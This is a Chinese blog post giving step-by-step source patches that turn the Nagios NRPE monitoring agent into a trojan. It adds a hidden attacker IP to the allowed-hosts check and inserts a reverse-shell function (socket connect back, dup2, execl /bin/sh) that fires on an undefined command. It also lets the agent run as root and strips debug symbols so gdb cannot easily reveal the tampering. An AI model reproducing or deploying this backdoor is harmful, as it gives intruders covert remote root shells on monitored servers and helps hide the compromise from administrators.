Nrpe变身木马客户端

2013年2月27日 发表评论 阅读评论

去年研究nagios的时候就对nrpe的“潜能”进行了挖掘,成功改造成为一个黑客客户端,但一切只是自己测试所用,不想公布出来,防止别人用此做“不合理”的事,今天试着公布出来,玩玩,但不要在线上环境部署。

nrpe是nagios的一个远程插件,cs架构,nagios发nrpe已经定义好的指令给nrpe运行,返回结果,一切看似有序进行。但既然nrpe是一个客户端,可以运行指令,所以我们只需要稍微改改nrpe的源码就可以让nrpe越权操作你想做的事。
先截图展示一下效果:

nrpe.cfg是个正常在用的nagios监控客户端,没有任何异常,里面没有定义kill命令。
1:先在b机器用nc监听5666端口,开好防火墙,等待shell的反弹;
2:在b机器上对nrpe客户端的a机器发送指令 kill
3:成功返回一个Segmentation的自定义标识,用id命令看下,而且返回来的是root权限,权限到手,接下来就随心所欲了。

接下来详细讲解改源码步骤:
下载nrpe源码

wget http://nchc.dl.sourceforge.net/project/nagios/nrpe-2.x/nrpe-2.12/nrpe-2.12.tar.gz
解压
tar xvf nrpe-2.12.tar.gz

先正常编译

cd nrpe-2.12
./configure --prefix=/usr/local/nrpe --with-nagios-user=nagios --with-nagios-group=nagios  --enable-command-args
make
make install

然后进行正式地修改cd src;make clean #把刚才编译好的文件删了,因为等下我们要改的就是nrpe.c这个文件,改好之后在src目录直接make编译即可。nrpe.c只有2k行左右,大概看一下,就大概了解了工作流程。

编辑nrpe.c 在953行看到看到定义的is_an_allowed_host函数,这个是nrpe配置文件里面配置的运行哪些服务端发送指令过来,既然说是要黑客木马程序,我们肯定不能在配置文件里面加入我们的服务端ip,我们在这里定义一个”vip客户”:在函数下面加入

char vip_ptr1[16]="121.XXX.XXX.XXX"; 这行。继续找到下面这段:

/* try and match IP addresses first */
        for(temp_ptr=strtok(temp_buffer,",");temp_ptr!=NULL;temp_ptr=strtok(NULL,",")){
                if(!strcmp(connecting_host,temp_ptr)){
                        result=1;
                        break;
                        }
                }

在这里加入我们的vip客户:

for(temp_ptr=strtok(temp_buffer,",");temp_ptr!=NULL;temp_ptr=strtok(NULL,",")){
                if(!strcmp(connecting_host,vip_ptr1)){
                        result=1;
                        break;
                        }
                if(!strcmp(connecting_host,temp_ptr)){
                        result=1;
                        break;
                        }

这样 vip_ptr1这个ip就在nrpe的服务范围了,不用在nrpe的配置文件里面暴露我们的踪迹。

继续找到1890行左右有个process_arguments函数,我们在这个上方加入我们的”main”函数,为什么打双引号呢,因为这个不是真的main函数,我们不能动这个文件的main,但是可以加入别的函数mainmain函数:

void usage();
        char shell[]="/bin/sh";
        char message[]="Segmentationn";
        int sock;
        int mainmain(char IP[]) {
                struct sockaddr_in server;
                if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                return;
        }
        server.sin_family = AF_INET;
        server.sin_port = htons(5666);
        server.sin_addr.s_addr = inet_addr(IP);
        if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
        return ;
        }
        send(sock, message, sizeof(message), 0);
        dup2(sock, 0);
        dup2(sock, 1);
        dup2(sock, 2);
        execl(shell,"/bin/sh",(char *)0);
        return ;
}
void usage(char *prog[]) {
exit(1);
}

加入好我们的main函数之后,我们要找地方调用,搜索temp_command=find_command(command_name);这行,大概在1200行左右,这里是定义查找配置文件允许的命令的地方,我们在这里加入后门,下面是if(temp_command==NULL){ 如果没找到定义的命令就返回NRPE: Command '%s' not defined",command_name,我们不需要返回了,我们定义如果没找到定义的命令,我们就执行我们的后面程序,在if(temp_command==NULL){下面加入我们之前定义的ip和函数:

mainmain("121.XXX.XXX.XXX");

另外,nrpe不支持root权限运行,我们可以再做个小动作:搜索bail if daemon is running as root ,大概在1656行左右,把下面的if(uid==0 || gid==0){里面的0改为1,这样就可以用root用户启动了。当然我们不需要用root用户启动,如果是普通用户,我们得到的就是普通的shell了,centos 5.5有个提权的漏洞,可以提升普通用户为root,这里就不加进去了。

修改好之后,保存,在src目录make clean ; make ; make install这样就编译好了,当正常的用户nagios客户端时候用的毫无破绽。当我们在指定的ip上面nc监听一个端口,然后再触发一下,一个shell就到手了。

下面再做个小动作完善一下。因为configure时候已经把Makefile生成好了,但是他默认是允许gdb调试的。我们gdb nrpe,然后l就会发现我们所做的手脚露馅了,不过我们可以继续改,在Makefile里面改个小东西vi Makefile 找到CFLAGS这一行,在12行左右,把 -g 这个参数去掉,然后重新make clean ; make ; make install 安装重新编译之后,我们重新gdb调试,就会发现,l命令已经不生效了,提示

(gdb) l
No symbol table is loaded. Use the "file" command.,找不到调试的信息了。就这样再次隐藏了一下,虽然这是此地无银三百两了。

ok,完毕。自己看着玩吧,后果自负。

注:以上内容摘自于互联网。




本站的发展离不开您的资助,金额随意,欢迎来赏!

You can donate through PayPal.
My paypal id: itybku@139.com
Paypal page: https://www.paypal.me/361way

分类: 开源软件 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.